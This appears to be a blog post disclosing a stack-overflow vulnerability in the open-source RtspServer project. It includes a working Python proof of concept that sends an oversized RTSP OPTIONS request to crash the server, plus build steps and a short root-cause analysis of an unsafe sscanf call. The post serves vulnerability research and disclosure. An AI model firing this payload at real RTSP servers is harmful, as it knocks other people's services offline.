hu1y40's blog

hu1y40'blog
天堂的穹空遍布地狱之火的颜色,但也是天堂。
  1. 首页
  2. 漏洞分析
  3. 二进制
  4. DoS
  5. 正文

RTSPServer StackOverflow Vulnerability

2023年12月8日 23146点热度 0人点赞 0条评论

RTSPServer StackOverflow Vulnerability

0x00 Introduction

Project URL:https://github.com/PHZ76/RtspServer

0x01 PoC

1.1 PoC

import socket

def send_rtsp_options_request(server_ip, server_port, rtsp_path):
# make RTSP OPTIONS request
d = "4f5054494f4e53202f2e3a2f"+"41"*5000+"00003a2f2f3132372e302e302e313a3535342f6c69766520525453502f312e300d0a435365713a20310d0a557365722d4167656e743a2066757a7a0d0a0d0a"

rtsp_options_request = bytes.fromhex(d)

# create TCP socket
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect((server_ip, server_port))

# send RTSP OPTIONS reqeust
s.sendall(rtsp_options_request)

# get response
response = s.recv(1024)
print(response.decode())

if __name__ == "__main__":
server_ip = "192.168.175.136"
server_port = 554
rtsp_path = "/example.sdp"

send_rtsp_options_request(server_ip, server_port, rtsp_path)

Need to change server_ip to the IP address of the target machine.

1.2 build and start server

git clone https://github.com/PHZ76/RtspServer.git
cd RtspServer
make
sudo ./rtsp_h264_file ./test.h264

0x02 Analyze

The vulnerability is located RtspMesaage.cpp:64.

The message variable is controllable by the attacker, and the format parameter of sscanf is not secure.

fig:

fig:

Doing stack backtracking, it was found that the stack has been overwritten by 0x41414141

fig:

标签: 漏洞
最后更新:2023年12月16日

hu1y40

这个人很懒,什么都没留下

点赞
< 上一篇

文章评论

razz evil exclaim smile redface biggrin eek confused idea lol mad twisted rolleyes wink cool arrow neutral cry mrgreen drooling persevering
取消回复
文章目录
  • RTSPServer StackOverflow Vulnerability
    • 0x00 Introduction
    • 0x01 PoC
      • 1.1 PoC
      • 1.2 build and start server
    • 0x02 Analyze

分类目录

  • 0day安全
  • Bypass
  • C++Prime
  • CTF
  • DoS
  • DoS
  • FUZZ
  • iot
  • JSONP
  • MISC
  • MISC
  • PHP伪协议
  • Python
  • REVERSE
  • sqli-labs
  • SQL注入
  • Trick
  • UAF
  • WEB
  • WEB
  • XXE
  • 书籍阅读
  • 二进制
  • 代码阅读
  • 信息搜集
  • 信息泄露
  • 加密与解密
  • 双重释放漏洞
  • 反序列化
  • 命令执行
  • 命令执行
  • 堆溢出
  • 密码学
  • 弱加密
  • 提权漏洞
  • 整数溢出
  • 文件上传
  • 未分类
  • 栈溢出
  • 格式化字符串漏洞
  • 模型
  • 汇编语言
  • 渗透测试
  • 漏洞分析
  • 漏洞利用
  • 漏洞战争
  • 漏洞挖掘
  • 病毒分析
  • 越界读取
  • 路径遍历
  • 逻辑漏洞
  • 配置不当
  • 钓鱼
  • 靶场
最新 热点 随机
最新 热点 随机
加密算法 2023年度总结 RTSPServer StackOverflow Vulnerability FUZZ 总览篇 MP4Box 无限循环漏洞 CVE-2023-40477 Winrar RCE漏洞分析
加密与解密 第5章实验 bugku Linux Fuzzing101 9 bugku ez_fibon 工商银行美国子公司遭LockBit勒索攻击 CVE-2021-35515 Apache Commons Compress拒绝服务漏洞

COPYRIGHT © 2023 hu1y40's blog. ALL RIGHTS RESERVED.

Theme Kratos Made By Seaton Jiang

鄂ICP备2021009673号-1